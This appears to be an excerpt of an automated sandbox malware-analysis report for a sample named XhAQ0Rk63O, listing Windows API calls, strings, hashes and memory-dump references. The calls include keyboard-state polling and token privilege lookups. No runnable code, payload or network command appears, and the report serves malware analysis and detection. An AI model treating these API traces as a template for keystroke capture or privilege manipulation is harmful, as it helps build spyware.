                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                          • String ID: ThumbnailClass
                                                                                          • API String ID: 4123061591-1241985126
                                                                                          • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                          • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                          • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                          • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                          APIs
                                                                                            • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                            • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                            • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                            • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                          • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                          • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                          • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                          • ReleaseCapture.USER32 ref: 0046F589
                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                          • API String ID: 2483343779-2060113733
                                                                                          • Opcode ID: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                                          • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                          • Opcode Fuzzy Hash: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                                          • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                          APIs
                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                          • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                          • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                          • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                          • String ID: 2
                                                                                          • API String ID: 1331449709-450215437
                                                                                          • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                          • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                          • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                          • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                          • _memcmp.LIBCMT ref: 004394A9
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                          Strings
                                                                                          • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                          • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                          • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                          • API String ID: 1446985595-805462909
                                                                                          • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                          • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                          • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                          • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$DriveType
                                                                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                          • API String ID: 2907320926-41864084
                                                                                          • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                          • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                          • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                          • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                          APIs
                                                                                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                          • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID:
                                                                                          • API String ID: 1932665248-0
                                                                                          • Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                          • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                          • Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                          • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
• GetWindowLongW.USER32(?,000000F0), ref: 004481A7
• _memset.LIBCMT ref: 004481BA
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
• SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
• SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
APIs
  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
• DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
• ImageList_Destroy.COMCTL32(?), ref: 0046EB04
• ImageList_Destroy.COMCTL32(?), ref: 0046EB18
• ImageList_Destroy.COMCTL32(?), ref: 0046EB24
• DeleteObject.GDI32(00740000), ref: 0046EB4F
• DestroyIcon.USER32(0041005C), ref: 0046EB67
• DeleteObject.GDI32(0001B228), ref: 0046EB7F
• DestroyWindow.USER32(00730055), ref: 0046EB97
• DestroyIcon.USER32(?), ref: 0046EBBF
• DestroyIcon.USER32(?), ref: 0046EBCD
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
• String ID:
• API String ID: 802431696-0
APIs
• GetKeyboardState.USER32(?,?,?), ref: 00444D8A
• GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
• GetKeyState.USER32(000000A0), ref: 00444E26
• GetAsyncKeyState.USER32(000000A1), ref: 00444E40
• GetKeyState.USER32(000000A1), ref: 00444E51
• GetAsyncKeyState.USER32(00000011), ref: 00444E69
• GetKeyState.USER32(00000011), ref: 00444E77
• GetAsyncKeyState.USER32(00000012), ref: 00444E8F
• GetKeyState.USER32(00000012), ref: 00444E9D
• GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
• GetKeyState.USER32(0000005B), ref: 00444EC3
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID:
• String ID: HH
• API String ID: 0-2761332787
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
• SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
• _wcslen.LIBCMT ref: 00450944
• _wcscat.LIBCMT ref: 00450955
• SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
• SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: MessageSend$Window_wcscat_wcslen
• String ID: -----$SysListView32
• API String ID: 4008455318-3975388722
APIs
• _memset.LIBCMT ref: 00448625
• CreateMenu.USER32 ref: 0044863C
• SetMenu.USER32(?,00000000), ref: 0044864C
• GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
• IsMenu.USER32(?), ref: 004486EB
• CreatePopupMenu.USER32 ref: 004486F5
• InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
• DrawMenuBar.USER32 ref: 00448742
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0
• API String ID: 176399719-4108050209
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
• GetDlgCtrlID.USER32(00000000), ref: 00469289
• GetParent.USER32 ref: 004692A4
• SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
• GetDlgCtrlID.USER32(00000000), ref: 004692AE
• GetParent.USER32 ref: 004692C7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
• GetDlgCtrlID.USER32(00000000), ref: 00469483
• GetParent.USER32 ref: 0046949E
• SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
• GetDlgCtrlID.USER32(00000000), ref: 004694A8
• GetParent.USER32 ref: 004694C1
• SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
                                                                                          APIs
                                                                                            • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                          • SendMessageW.USER32(76C223D0,00001001,00000000,00000000), ref: 00448E73
                                                                                          • SendMessageW.USER32(76C223D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                            • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                          • String ID:
                                                                                          • API String ID: 3771399671-0
                                                                                          • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                          • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                          • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                          • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 3413494760-0
                                                                                          • Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                          • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                          • Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                          • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                          • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                          • String ID:
                                                                                          • API String ID: 2156557900-0
                                                                                          • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
